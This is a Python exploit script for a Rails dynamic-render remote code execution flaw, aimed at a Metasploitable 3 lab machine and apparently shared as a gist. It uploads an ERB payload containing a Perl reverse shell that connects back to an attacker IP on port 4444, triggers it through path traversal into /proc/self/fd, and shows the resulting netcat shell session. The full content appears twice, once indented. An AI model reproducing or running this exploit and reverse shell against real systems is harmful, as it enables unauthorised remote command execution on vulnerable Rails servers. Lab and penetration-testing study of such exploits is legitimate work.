pich4ya/readme_render_exploit.py

## readme_render_exploit.py
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - render params[:os] 's RCE
# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string
import requests

# 1. tmp upload

host = "172.28.128.3"
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"

headers = {"Content-Type": "multipart/form-data; boundary=_Part_596_558276832_972275724", "Connection": "close"}
payload = "--_Part_596_558276832_972275724\r\nContent-Disposition: form-data; name=\"ggez\"; filename=\"ggez\"\r\n\r\n<%=`"+cmd+"`%>\r\n--_Part_596_558276832_972275724--\r\n"
requests.post("http://"+host+":3500/", headers=headers, data=payload)


# 2. trigger
requests.get("http://"+host+":3500/readme/?os=../../../../proc/self/fd/7")

'''
$ python readme_render_exploit.py

$ nc -lvp 4444
listening on [any] 4444 ...
192.168.15.1: inverse host lookup failed: Unknown host
connect to [192.168.15.133] from (UNKNOWN) [192.168.15.1] 50209
pwd
/opt/readme_app
id
uid=1124(chewbacca) gid=100(users) groups=100(users),999(docker)
ls
Gemfile
Gemfile.lock
README.md
Rakefile
app
bin
config
config.ru
db
lib
log
public
start.sh
test
tmp
vendor

'''
	# @author Pichaya Morimoto (p.morimoto@sth.sh)
	# Exploit for Metasploitable 3 - render params[:os] 's RCE
	# msf: multi/http/rails_dynamic_render_code_exec is not working due to no ImageMagick
	# This exploit slightly adjusts the temporary file extension to an empty string
	import requests

	# 1. tmp upload

	host = "172.28.128.3"
	cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"

	headers = {"Content-Type": "multipart/form-data; boundary=_Part_596_558276832_972275724", "Connection": "close"}
	payload = "--_Part_596_558276832_972275724\r\nContent-Disposition: form-data; name=\"ggez\"; filename=\"ggez\"\r\n\r\n<%=`"+cmd+"`%>\r\n--_Part_596_558276832_972275724--\r\n"
	requests.post("http://"+host+":3500/", headers=headers, data=payload)


	# 2. trigger
	requests.get("http://"+host+":3500/readme/?os=../../../../proc/self/fd/7")

	'''
	$ python readme_render_exploit.py

	$ nc -lvp 4444
	listening on [any] 4444 ...
	192.168.15.1: inverse host lookup failed: Unknown host
	connect to [192.168.15.133] from (UNKNOWN) [192.168.15.1] 50209
	pwd
	/opt/readme_app
	id
	uid=1124(chewbacca) gid=100(users) groups=100(users),999(docker)
	ls
	Gemfile
	Gemfile.lock
	README.md
	Rakefile
	app
	bin
	config
	config.ru
	db
	lib
	log
	public
	start.sh
	test
	tmp
	vendor

	'''